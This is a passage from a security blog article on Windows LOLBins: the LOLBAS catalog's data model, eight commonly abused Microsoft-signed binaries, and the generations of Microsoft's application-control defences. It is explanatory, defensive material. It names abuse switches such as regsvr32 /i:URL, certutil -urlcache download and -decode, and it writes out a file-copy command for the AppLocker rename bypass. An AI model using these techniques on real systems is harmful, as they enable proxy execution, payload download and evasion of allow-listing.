AppLocker is a defense-in-depth security feature and not considered a defensible Windows security feature. -- Microsoft Learn, AppLocker overview [@ms-applocker-overview]
&lt;p&gt;The structural argument from this section is the rest of the article&apos;s load-bearing premise. If signature trust is decoupled from behavior trust &lt;em&gt;by construction&lt;/em&gt;, then for every Microsoft-signed binary that exposes a &quot;load and execute arbitrary script, DLL, or payload&quot; surface there exists a LOLBin disclosure waiting to be discovered. The question becomes empirical: how many such binaries are there? In 2018 nobody knew. By May 2026 the LOLBAS catalog has counted 207, and the count is still growing.&lt;/p&gt;
&lt;h2&gt;4. The LOLBAS Catalog as a Data Structure&lt;/h2&gt;
&lt;p&gt;Most security catalogs are PDFs. LOLBAS is something different. It is a YAML file directory, a function taxonomy, an ATT&amp;amp;CK mapping, a pull-request contract, and a rendered frontend -- all on GitHub. To understand the LOLBin problem in 2026 you have to understand the catalog as an &lt;em&gt;artifact&lt;/em&gt; the defender community built, not just a list of binaries.&lt;/p&gt;
&lt;p&gt;The repository at &lt;code&gt;LOLBAS-Project/LOLBAS&lt;/code&gt; [@lolbas-github] organizes its entries into four directories on disk, each with a per-entry YAML file. The May 2026 breakdown:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Directory&lt;/th&gt;
&lt;th align=&quot;right&quot;&gt;Count&lt;/th&gt;
&lt;th&gt;What it holds&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;yml/OSBinaries/&lt;/code&gt;&lt;/td&gt;
&lt;td align=&quot;right&quot;&gt;130&lt;/td&gt;
&lt;td&gt;Native Windows-shipped executables (&lt;code&gt;regsvr32&lt;/code&gt;, &lt;code&gt;rundll32&lt;/code&gt;, &lt;code&gt;mshta&lt;/code&gt;, &lt;code&gt;certutil&lt;/code&gt;, ...)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;yml/OtherMSBinaries/&lt;/code&gt;&lt;/td&gt;
&lt;td align=&quot;right&quot;&gt;77&lt;/td&gt;
&lt;td&gt;Microsoft-signed executables downloadable from Microsoft (Visual Studio, SDK, optional features)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;yml/OSLibraries/&lt;/code&gt;&lt;/td&gt;
&lt;td align=&quot;right&quot;&gt;17&lt;/td&gt;
&lt;td&gt;DLLs that can be loaded as LOLBin payloads (the LOLLib subclass)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;yml/OSScripts/&lt;/code&gt;&lt;/td&gt;
&lt;td align=&quot;right&quot;&gt;10&lt;/td&gt;
&lt;td&gt;Microsoft-shipped scripts (the LOLScript subclass)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total&lt;/strong&gt;&lt;/td&gt;
&lt;td align=&quot;right&quot;&gt;&lt;strong&gt;234&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;207 binaries plus 27 libraries and scripts&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

A Living-Off-the-Land Script: a Microsoft-signed script file (typically `.vbs`, `.js`, `.ps1`, or `.bat`) shipped with Windows that an attacker can invoke for proxy execution, file download, or privilege manipulation. LOLScripts are tracked in the `yml/OSScripts/` directory of the LOLBAS repository [@lolbas-github]. The companion category for DLLs is *LOLLib*.
&lt;p&gt;The 207-binary figure is the one that matters for the architectural argument later, and it is not folklore. It is a primary-source count derived by enumerating the four directory listings against the live repository on May 26, 2026 [@lolbas-org-api]. The repository as of that date has 8,567 stars and 1,135 forks.&lt;/p&gt;
&lt;p&gt;Each entry follows a strict YAML schema [@lolbas-yml-template]. The mandatory fields are &lt;code&gt;Name&lt;/code&gt;, &lt;code&gt;Description&lt;/code&gt;, &lt;code&gt;Author&lt;/code&gt;, &lt;code&gt;Created&lt;/code&gt;, one or more &lt;code&gt;Commands&lt;/code&gt; blocks, &lt;code&gt;Full_Path&lt;/code&gt;, &lt;code&gt;Code_Sample&lt;/code&gt;, &lt;code&gt;Detection&lt;/code&gt;, &lt;code&gt;Resources&lt;/code&gt;, and &lt;code&gt;Acknowledgements&lt;/code&gt;. Inside each &lt;code&gt;Commands&lt;/code&gt; block sits the function taxonomy that defenders read first.&lt;/p&gt;

flowchart TD
    Entry[&quot;YAML entry: Name&lt;br /&gt;Description, Author, Created&quot;]
    Entry --&amp;gt; Commands[&quot;Commands[]&quot;]
    Commands --&amp;gt; C1[&quot;Command 1: command-line invocation&quot;]
    Commands --&amp;gt; C2[&quot;Command 2: command-line invocation&quot;]
    C1 --&amp;gt; Use[&quot;Use: plain-English description&quot;]
    C1 --&amp;gt; Category[&quot;Category: Execute, Download, Compile, AWL Bypass, ...&quot;]
    C1 --&amp;gt; Priv[&quot;Privileges: User or Admin&quot;]
    C1 --&amp;gt; Mitre[&quot;MitreID: T1218.010, T1127.001, ...&quot;]
    Entry --&amp;gt; Paths[&quot;Full_Path[]: where the binary lives on disk&quot;]
    Entry --&amp;gt; Detect[&quot;Detection[]: vendor-curated detection links&quot;]
    Entry --&amp;gt; Refs[&quot;Resources[]: primary disclosures and writeups&quot;]
    Entry --&amp;gt; Ack[&quot;Acknowledgements[]: credited researchers&quot;]
&lt;p&gt;The function taxonomy is a closed set of eleven categories: &lt;code&gt;Execute&lt;/code&gt;, &lt;code&gt;Download&lt;/code&gt;, &lt;code&gt;Copy&lt;/code&gt;, &lt;code&gt;Encode&lt;/code&gt;, &lt;code&gt;Decode&lt;/code&gt;, &lt;code&gt;Compile&lt;/code&gt;, &lt;code&gt;Credentials&lt;/code&gt;, &lt;code&gt;AWL Bypass&lt;/code&gt;, &lt;code&gt;AWL Bypass + UAC Bypass&lt;/code&gt;, &lt;code&gt;Reconnaissance&lt;/code&gt;, and &lt;code&gt;Dump&lt;/code&gt;. Every command in the catalog carries exactly one of those tags. The vocabulary is small because the surface is small. A Microsoft-signed binary, by definition, was not designed to do these things, so the abuse primitives concentrate at a small number of recognizable shapes.&lt;/p&gt;
&lt;p&gt;The gate that decides whether a binary is admitted to the catalog is published verbatim in the repository README [@lolbas-github]:&lt;/p&gt;

Must be a Microsoft-signed file, either native to the OS or downloaded from Microsoft. Have extra &apos;unexpected&apos; functionality. ... Have functionality that would be useful to an APT or red team. -- LOLBAS criteria [@lolbas-github]
&lt;p&gt;The two clauses do most of the project&apos;s editorial work. The first clause -- &lt;em&gt;Microsoft-signed, native or downloaded from Microsoft&lt;/em&gt; -- is what aligns the catalog with the AppLocker default publisher rule from Section 3. A binary that does not pass that gate is somebody else&apos;s problem (probably an EV-certificate review). The second clause -- &lt;em&gt;extra unexpected functionality, useful to an APT or red team&lt;/em&gt; -- is what excludes binaries whose abuse pattern is documented behavior nobody disputes (&lt;code&gt;cmd.exe&lt;/code&gt; running a script is not a LOLBin; &lt;code&gt;regsvr32.exe&lt;/code&gt; fetching a script from &lt;code&gt;http://&lt;/code&gt; is).&lt;/p&gt;
&lt;p&gt;Governance is pull-request-driven and run by a named maintainer group: Oddvar Moe (the original creator), Jimmy Bayne, Conor Richard, Chris &quot;Lopi&quot; Spehn, Liam Somerville, Wietze Beukema, and Jose Hernandez [@lolbas-github]. The model is the one Linux distributions use for package metadata: a small editorial board, public submission, public review, semver-style additions. The repository receives regular pull requests; the May 2026 commit log shows entries dated 2026 alongside the 2018 founders [@lolbas-org-api]. The rendered frontend at &lt;code&gt;lolbas-project.github.io&lt;/code&gt; exposes the same data as a browsable per-binary site [@lolbas-frontend].&lt;/p&gt;
&lt;p&gt;The LOLBAS frontend at &lt;code&gt;lolbas-project.github.io&lt;/code&gt; is visually modelled on GTFOBins, the Unix analogue maintained by Andrea Cardaci and Emilio Pinna [@gtfobins]. The LOLBAS README explicitly thanks GTFOBins for the rendering pattern. The two projects share the same conceptual move -- a community catalog of vendor-shipped utilities with attacker-useful side effects -- applied to different platforms.&lt;/p&gt;
&lt;p&gt;The catalog&apos;s status as a &lt;em&gt;data structure&lt;/em&gt; is what distinguishes it from a textbook chapter. Splunk&apos;s Threat Research team publishes detection content keyed directly to LOLBAS entries [@splunk-detection]; the MITRE ATT&amp;amp;CK pages for T1218, T1216, T1127, T1197, T1140, and T1105 cite individual LOLBAS pages as primary references [@attack-t1218]; CISA&apos;s joint LOTL guidance with the NSA, FBI, ASD/ACSC, NCSC-UK, and others mirrors the LOLBAS structure in its detection annexes [@cisa-lotl]. The catalog is the canonical input to every downstream defense product that takes LOLBins seriously.&lt;/p&gt;
&lt;p&gt;Two hundred and seven binaries. The next question is the question every defender asks the first time they look at the list: of those 207, which ones actually show up in real incidents, and what makes the recurring offenders special? That is the field guide.&lt;/p&gt;
&lt;h2&gt;5. The Canonical Eight: A Field Guide&lt;/h2&gt;
&lt;p&gt;Of the 207 binaries in the LOLBAS catalog, eight anchor most real-world incidents. Each one tells the same story: &lt;em&gt;a Microsoft-signed utility doing what it was designed to do, with attacker-controlled arguments&lt;/em&gt;. These eight are the canonical introduction to the class, the binaries every SOC writes detections for first, and the binaries Microsoft&apos;s Recommended Block Rules either deny by default or pointedly do not.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Binary&lt;/th&gt;
&lt;th&gt;First disclosed&lt;/th&gt;
&lt;th&gt;Abuse primitive&lt;/th&gt;
&lt;th&gt;MITRE ATT&amp;amp;CK&lt;/th&gt;
&lt;th&gt;On App Control deny list?&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;regsvr32.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Casey Smith, 2016-04-19&lt;/td&gt;
&lt;td&gt;Squiblydoo: remote &lt;code&gt;.sct&lt;/code&gt; via &lt;code&gt;/i:URL&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;T1218.010 [@attack-t1218-010]&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;rundll32.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Multiple disclosures&lt;/td&gt;
&lt;td&gt;Load and invoke any exported DLL function&lt;/td&gt;
&lt;td&gt;T1218.011 [@attack-t1218-011]&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;mshta.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Pre-LOLBAS, IE5 era&lt;/td&gt;
&lt;td&gt;Run JScript or VBScript from &lt;code&gt;.hta&lt;/code&gt; file or URL&lt;/td&gt;
&lt;td&gt;T1218.005 [@attack-t1218-005]&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;certutil.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Pre-LOLBAS folklore&lt;/td&gt;
&lt;td&gt;&lt;code&gt;-urlcache&lt;/code&gt; download, &lt;code&gt;-decode&lt;/code&gt; payload decoder&lt;/td&gt;
&lt;td&gt;T1140, T1105&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;bitsadmin.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Pre-LOLBAS folklore&lt;/td&gt;
&lt;td&gt;BITS-channel download primitive&lt;/td&gt;
&lt;td&gt;T1197 [@attack-t1197]&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;msbuild.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Casey Smith, 2016&lt;/td&gt;
&lt;td&gt;Inline-task compile-and-run C#&lt;/td&gt;
&lt;td&gt;T1127.001 [@attack-t1127]&lt;/td&gt;
&lt;td&gt;Yes, with caveat&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;installutil.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Casey Smith, 2016&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/U&lt;/code&gt; invokes &lt;code&gt;[RunInstaller(true)]&lt;/code&gt; class&lt;/td&gt;
&lt;td&gt;T1218.004 [@attack-t1218-004]&lt;/td&gt;
&lt;td&gt;Yes (unconditional)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Microsoft.Workflow.Compiler.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Matt Graeber, 2018-08-17&lt;/td&gt;
&lt;td&gt;XOML-driven C#/VB.NET compile-and-execute&lt;/td&gt;
&lt;td&gt;T1127 [@attack-t1127]&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The table looks orderly. The pattern inside it is not.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;regsvr32.exe&lt;/code&gt;&lt;/strong&gt; is the article&apos;s opening case, the most famous LOLBin in history, and -- conspicuously -- &lt;em&gt;not&lt;/em&gt; on the App Control Recommended Block Rules deny list [@ms-bypass-rules]. The reason is operational. &lt;code&gt;regsvr32&lt;/code&gt; is the OS-bundled mechanism for installing and uninstalling COM servers; denying it would break legacy installers, in-place upgrades of components like ODBC drivers, and a broad sweep of administrative tooling. Microsoft&apos;s choice is to &lt;em&gt;detect&lt;/em&gt; Squiblydoo via behavioral signals (parent-child anomaly, &lt;code&gt;/i:http&lt;/code&gt; argument) rather than &lt;em&gt;deny&lt;/em&gt; the binary outright.&lt;/p&gt;
&lt;p&gt;The conspicuous absence of &lt;code&gt;regsvr32.exe&lt;/code&gt; from the Recommended Block Rules is one of the most-revealing facts in the LOLBin literature. Microsoft is saying, in policy form: we cannot take this binary off the disk, we cannot deny it at App Control, and we trust your EDR or your ASR rules to catch the abusive invocations. The detection burden is structurally transferred from the platform to the customer.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;rundll32.exe&lt;/code&gt;&lt;/strong&gt; is the longest-lived AWL bypass primitive in the catalog. Almost every COM out-of-process invocation in Windows uses it, and many shell namespace extensions invoke it. Denying &lt;code&gt;rundll32.exe&lt;/code&gt; would render the desktop nearly inoperable. It is, like &lt;code&gt;regsvr32&lt;/code&gt;, on the &lt;em&gt;detect, do not deny&lt;/em&gt; side of the line.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;mshta.exe&lt;/code&gt;&lt;/strong&gt; is on the Recommended Block Rules list. Microsoft can deny it because HTA files are a 1999 technology (the HTML Application format was introduced with Internet Explorer 5 [@ms-hta-overview]) and the platform no longer requires &lt;code&gt;mshta.exe&lt;/code&gt; to be functional for routine operation [@ms-bypass-rules].&lt;/p&gt;

`mshta.exe` -- Microsoft HTML Application Host -- ships with every modern Windows release. The binary&apos;s reason for existing was Internet Explorer&apos;s HTML Application (HTA) format, introduced with Internet Explorer 5 in 1999, so administrators could write GUI applications in HTML, CSS, and JScript without an IDE [@ms-hta-overview]. Internet Explorer 11 was retired on June 15, 2022 [@ms-ie11-lifecycle]. HTA support remains, because removing it would break a long tail of internal corporate tooling. `mshta.exe` is the canonical example of a binary that outlived its motivating product by more than two decades and now exists primarily so attackers can run JScript in a signed process.
&lt;p&gt;&lt;strong&gt;&lt;code&gt;certutil.exe&lt;/code&gt;&lt;/strong&gt; is one of the field&apos;s quiet recurring offenders. Two switches drive most of its abuse: &lt;code&gt;-urlcache -split -f&lt;/code&gt; downloads an arbitrary URL to disk, and &lt;code&gt;-decode&lt;/code&gt; decodes Base64 or hex payloads. Neither is documented as a security feature; both are necessary for legitimate certificate-management workflows. &lt;code&gt;certutil&lt;/code&gt; is &lt;em&gt;not&lt;/em&gt; on the App Control deny list.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;bitsadmin.exe&lt;/code&gt;&lt;/strong&gt; and its PowerShell sibling &lt;code&gt;Start-BitsTransfer&lt;/code&gt; drive downloads through the Background Intelligent Transfer Service, the same channel Windows Update uses. The traffic looks like normal Windows traffic at the network layer. BITS Jobs is tracked as T1197 [@attack-t1197]. &lt;code&gt;bitsadmin.exe&lt;/code&gt; is not on the deny list either.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;msbuild.exe&lt;/code&gt;&lt;/strong&gt; is the most interesting case in the table because Microsoft&apos;s response is published verbatim and is &lt;em&gt;context-dependent&lt;/em&gt;. The Recommended Block Rules entry for &lt;code&gt;msbuild.exe&lt;/code&gt; reads:&lt;/p&gt;

If you&apos;re using your reference system in a development context and use msbuild.exe to build managed applications, we recommend that you allow msbuild.exe in your code integrity policies. Otherwise, we recommend that you block msbuild.exe. -- Microsoft Learn, Applications that can bypass App Control [@ms-bypass-rules]
&lt;p&gt;That single sentence is the structural argument from Section 9 in microcosm. The deny list cannot decide for itself whether &lt;code&gt;msbuild.exe&lt;/code&gt; is a LOLBin; the answer depends on whether the endpoint is a developer workstation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;installutil.exe&lt;/code&gt;&lt;/strong&gt; is the .NET Framework installer-class entry-point runner. Casey Smith&apos;s 2016 disclosure showed that &lt;code&gt;installutil.exe /U mybinary.exe&lt;/code&gt; invokes any class decorated with &lt;code&gt;[System.ComponentModel.RunInstaller(true)]&lt;/code&gt;, regardless of whether that class is part of an installer. The technique is documented at LOLBAS [@lolbas-installutil] and tracked as T1218.004 [@attack-t1218-004]. &lt;code&gt;installutil.exe&lt;/code&gt; &lt;em&gt;is&lt;/em&gt; on the App Control deny list, unconditionally (any version) [@ms-bypass-rules], in contrast to &lt;code&gt;msbuild.exe&lt;/code&gt;&apos;s development-context caveat. That &lt;code&gt;installutil.exe&lt;/code&gt; is denied by default &lt;em&gt;and&lt;/em&gt; the LOLBin class persists anyway is the strongest small evidence that revocation is not the same as elimination.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;Microsoft.Workflow.Compiler.exe&lt;/code&gt;&lt;/strong&gt;, also known as &lt;code&gt;wfc.exe&lt;/code&gt;, is the canonical worst case. The binary is part of .NET Workflow Foundation. It accepts a pair of file arguments -- an input file (any extension; LOLBAS lists XOML as the canonical form) containing a &lt;code&gt;CompilerInput&lt;/code&gt; XML element with the attacker&apos;s C# or VB.NET source, and a log-file output path. The compiler compiles the embedded source and executes it in-process [@lolbas-mwc]. LOLBAS tracks it under T1127 (Trusted Developer Utilities Proxy Execution) [@attack-t1127], alongside &lt;code&gt;msbuild.exe&lt;/code&gt;, &lt;code&gt;dnx.exe&lt;/code&gt;, and &lt;code&gt;rcsi.exe&lt;/code&gt;. Matt Graeber&apos;s August 17, 2018 disclosure [@lolbas-mwc] demonstrated end-to-end unsigned-C# execution via a single command line. It &lt;em&gt;is&lt;/em&gt; on the App Control Recommended Block Rules list [@ms-bypass-rules]. Microsoft cannot remove the binary from Windows without breaking Workflow Foundation, but it can pin it as denied-by-default and direct developers who need it to allow-list it explicitly.&lt;/p&gt;

The abuse chain in which `Microsoft.Workflow.Compiler.exe` (a .NET Workflow Foundation utility, also distributed as `wfc.exe`) is invoked with an attacker-supplied input file -- any extension, canonical form XOML -- that contains a `CompilerInput` XML element holding C# or VB.NET source, plus a log-file output path. The compiler compiles the embedded source and executes the resulting assembly in-process. Disclosed by Matt Graeber on August 17, 2018 [@lolbas-mwc]. Now denied by default in Microsoft&apos;s App Control Recommended Block Rules [@ms-bypass-rules].
&lt;p&gt;Notice the pattern across the eight: each binary is either &lt;em&gt;on&lt;/em&gt; the Recommended Block Rules or it &lt;em&gt;isn&apos;t&lt;/em&gt;, and the binaries that are not on the list are the ones administrators cannot live without. The deny list, in other words, is &lt;em&gt;bounded&lt;/em&gt;: not by Microsoft&apos;s diligence, but by what Windows administration requires. How bounded? That is Section 6.&lt;/p&gt;
&lt;h2&gt;6. The Defensive Patchwork: Four Generations of Response&lt;/h2&gt;
&lt;p&gt;If you tried to fix Squiblydoo in 2016, the only primitive available was a per-binary AppLocker Deny rule. You wrote a rule that named &lt;code&gt;regsvr32.exe&lt;/code&gt;, you deployed it via Group Policy, and you watched an attacker bypass it by copying the binary to a writable directory and renaming it. Microsoft&apos;s response over the following eight years can be told as four generations of control. Each one closes a specific bypass class in the previous. None touches the defining property of the class itself.&lt;/p&gt;
&lt;h3&gt;Generation 0: Software Restriction Policies (2001-2009)&lt;/h3&gt;
&lt;p&gt;Before AppLocker there was &lt;em&gt;Software Restriction Policies&lt;/em&gt; (SRP), introduced with Windows XP and Windows Server 2003. SRP supported hash and path rules but had no first-class publisher rule. The policy language could not express &lt;em&gt;trust anything signed by Microsoft&lt;/em&gt;. At enterprise scale, SRP was unmaintainable. AppLocker explicitly superseded it; Microsoft now directs new deployments to AppLocker and App Control for Business rather than SRP [@ms-applocker-overview]. Generation 0 failed not because it was bypassed but because it was undeployable.&lt;/p&gt;
&lt;h3&gt;Generation 1: AppLocker with the default Microsoft publisher rule (2009-2017)&lt;/h3&gt;
&lt;p&gt;AppLocker, as Section 3 described, made application allow-listing deployable by introducing the publisher rule and pre-populating the default rule set to admit Microsoft-signed binaries [@ms-applocker-overview]. Squiblydoo (April 19, 2016) was the existence proof that the default rule was simultaneously &lt;em&gt;necessary for deployment&lt;/em&gt; and &lt;em&gt;insufficient for security&lt;/em&gt;. The standard mitigation in this era -- write a per-binary AppLocker Deny rule for &lt;code&gt;regsvr32.exe&lt;/code&gt;, &lt;code&gt;mshta.exe&lt;/code&gt;, and friends -- ran into a concrete worked counterexample:&lt;/p&gt;
&lt;p&gt;The AppLocker rename bypass is as simple as &lt;code&gt;copy %WINDIR%\System32\regsvr32.exe %TEMP%\sysadmin-helper.exe&lt;/code&gt;. The copied file retains its Authenticode signature (which signs the file bytes, not the filename). The default Microsoft-publisher allow rule admits the renamed copy. A Deny rule keyed to the original path or name silently fails. This is the bypass that motivated WDAC&apos;s move to kernel-mode signature evaluation and hash-revocation rules.&lt;/p&gt;
&lt;p&gt;A Deny rule keyed by path or filename loses to file copy. A Deny rule keyed by file hash loses the day Microsoft ships a new build on Patch Tuesday. AppLocker&apos;s policy language could express either constraint but not both at once. Neither held up against a determined attacker.&lt;/p&gt;
&lt;h3&gt;Generation 2: App Control for Business with Recommended Block Rules (2017-present)&lt;/h3&gt;
&lt;p&gt;Generation 2 is what most enterprises deploy today. &lt;a href=&quot;https://paragmali.com/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/&quot; rel=&quot;noopener&quot;&gt;Windows Defender Application Control (WDAC)&lt;/a&gt; shipped with Windows 10 1709 in October 2017, evolved out of Device Guard&apos;s Code Integrity Policies, and was rebranded &lt;em&gt;App Control for Business&lt;/em&gt; in the 2023-2024 documentation cycle [@ms-appcontrol-overview]. The system enforces signature-and-policy evaluation in kernel mode. The rename bypass that defeated AppLocker stops at the kernel boundary, because the kernel evaluates the file&apos;s signature and hash independently of its path.&lt;/p&gt;

The Microsoft kernel-mode application-control system formerly known as Windows Defender Application Control (WDAC). Ships with Windows 10 1709 and later. Policies are signed XML files that admit or deny binaries by signer, hash, file attribute, or path; the policy engine is enforced by the kernel&apos;s Code Integrity subsystem [@ms-appcontrol-overview]. The successor to AppLocker for managed enterprise deployments.

A Microsoft-curated, version-pinned XML deny list shipped via Microsoft Learn that App Control administrators merge into their base policy. As of 2026 the list denies roughly 40 binaries -- including `mshta.exe`, `Microsoft.Workflow.Compiler.exe`, conditionally `msbuild.exe`, and the older `system.management.automation.dll` versions that allowed PowerShell Constrained Language Mode bypass [@ms-bypass-rules]. The deny list grows as new bypasses are disclosed; addition lag is months to years.
&lt;p&gt;Generation 2 closed the per-name rename bypass and gave Microsoft a publication surface for revoking individual LOLBins. The deny list itself acknowledges the version-pinning problem in a dated breadcrumb on the Microsoft Learn page: &lt;em&gt;as of October 2017, system.management.automation.dll is updated to revoke earlier versions by hash values, instead of version rules&lt;/em&gt; [@ms-bypass-rules]. Revocation is applied case-by-case, not globally. What Generation 2 did &lt;em&gt;not&lt;/em&gt; close was the catalog-vs-deny-list coverage gap (see Section 8 for the side-by-side count). The Recommended Block Rules name roughly 40 binaries; the LOLBAS catalog enumerates 207. The residual is unaddressed by default.&lt;/p&gt;
&lt;h3&gt;Generation 3: Smart App Control (2022-present)&lt;/h3&gt;
&lt;p&gt;Smart App Control (SAC) is Microsoft&apos;s &lt;a href=&quot;https://paragmali.com/blog/mark-of-the-web-smartscreen-catalog-of-trust/&quot; rel=&quot;noopener&quot;&gt;reputation-and-AI gate&lt;/a&gt; for unmanaged consumer and small-business endpoints. It ships with clean installations of Windows 11 22H2 and later. It runs in an &lt;em&gt;evaluation&lt;/em&gt; mode that silently observes the user&apos;s behavior and either transitions to &lt;em&gt;enforce&lt;/em&gt; mode or silently disables itself depending on whether the observed activity is consistent with a managed-enough device [@ms-sac-overview]. The disable was originally one-way; the Definition below covers the recently-added in-place re-enable path [@ms-sac-support].&lt;/p&gt;

A Windows 11 22H2+ reputation-based application-gating feature that admits or blocks applications by Microsoft cloud lookup, with an AI classifier as a fallback. SAC ships in evaluation mode on clean installs only; it either transitions to enforcement or silently disables itself based on observed device usage [@ms-sac-overview]. Until recently a disabled SAC could only be revived by reinstalling Windows; a recent Windows cumulative update added an in-place re-enable path inside the Windows Security app [@ms-sac-support]. The silent disable itself remains.
&lt;p&gt;The Aha moment for SAC arrives when a defender reads the Microsoft Learn SAC overview carefully:&lt;/p&gt;

Note that some older Microsoft binaries are considered unsafe because attackers can potentially use them to gain unauthorized access. For a complete list of these files, please see Application Control for Windows. -- Microsoft Learn, Smart App Control overview [@ms-sac-overview]
&lt;p&gt;That sentence resolves the most common misconception about SAC. Smart App Control does not introduce a new LOLBin-handling mechanism. It &lt;em&gt;defers&lt;/em&gt; LOLBin handling to the App Control Recommended Block Rules deny list. SAC inherits the same 167-binary coverage gap Generation 2 has. The reputation-and-AI gate is a useful addition for unknown third-party software; for Microsoft-signed LOLBins it is the deny list with a different user interface.&lt;/p&gt;
&lt;p&gt;Generation 3&apos;s other documented failure mode is &lt;em&gt;silent disable&lt;/em&gt;. A device that was protected becomes unprotected with no admin signal. In August 2024, Elastic Security Labs published the &lt;em&gt;Dismantling Smart App Control&lt;/em&gt; analysis [@elastic-sac], which enumerated five distinct bypass classes: signed malware via EV certificates (SolarMarker burned through more than 100 unique certs), reputation hijacking via FFI-capable script hosts (Lua, Node.js, AutoHotkey), reputation seeding within roughly two hours, reputation tampering, and the LNK-stomping smuggling technique tracked as CVE-2024-38217 [@bleeping-lnk]. The LNK-stomping samples in VirusTotal date back six years.&lt;/p&gt;
&lt;h3&gt;Generation 4: Windows Resiliency Initiative (November 2024)&lt;/h3&gt;
&lt;p&gt;On November 19, 2024, at Microsoft Ignite, the company announced the &lt;em&gt;Windows Resiliency Initiative&lt;/em&gt; (WRI). It is an umbrella program, not a new enforcement mechanism, with four focus areas. The third is &lt;em&gt;stronger controls for what apps and drivers are allowed to run&lt;/em&gt; [@ms-wri-nov2024]. The June 2025 follow-up post adds the &lt;em&gt;Microsoft Virus Initiative 3.0&lt;/em&gt; (MVI 3.0) and the user-mode security agents work that moves third-party EDR drivers out of the kernel [@ms-wri-jun2025]. As of May 2026, WRI has not shipped a qualitatively new LOLBin-class enforcement primitive. It is a re-framing of the controls that already existed.&lt;/p&gt;

flowchart LR
    G0[&quot;Gen 0: SRP&lt;br /&gt;2001-2009&quot;] --&quot;closes &apos;no scalable publisher rule&apos;&quot;--&amp;gt; G1[&quot;Gen 1: AppLocker&lt;br /&gt;default publisher rule&lt;br /&gt;2009-2017&quot;]
    G1 --&quot;closes &apos;per-admin deny rules don&apos;t scale, rename bypass&apos;&quot;--&amp;gt; G2[&quot;Gen 2: App Control + Recommended Block Rules&lt;br /&gt;2017-present&quot;]
    G2 --&quot;closes &apos;no default-on for unmanaged endpoints&apos;&quot;--&amp;gt; G3[&quot;Gen 3: Smart App Control&lt;br /&gt;2022-present&quot;]
    G3 --&quot;institutional re-framing&quot;--&amp;gt; G4[&quot;Gen 4: Windows Resiliency Initiative&lt;br /&gt;2024-present&quot;]
    G4 -. unresolved .-&amp;gt; Class[&quot;The LOLBin class itself&quot;]
    style Class stroke:#c33,stroke-width:2px
    style G4 stroke:#888,stroke-dasharray: 5 5
&lt;p&gt;The summary table for the generational story:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Generation&lt;/th&gt;
&lt;th&gt;Years&lt;/th&gt;
&lt;th&gt;Closed&lt;/th&gt;
&lt;th&gt;Did not close&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;0: SRP&lt;/td&gt;
&lt;td&gt;2001-2009&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Undeployable at enterprise scale&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1: AppLocker&lt;/td&gt;
&lt;td&gt;2009-2017&lt;/td&gt;
&lt;td&gt;Allow-list scale problem&lt;/td&gt;
&lt;td&gt;Squiblydoo, rename bypass, Authenticode blindness&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2: App Control + Block Rules&lt;/td&gt;
&lt;td&gt;2017-present&lt;/td&gt;
&lt;td&gt;Rename bypass, per-name deny&lt;/td&gt;
&lt;td&gt;167-binary coverage gap&lt;/td&gt;
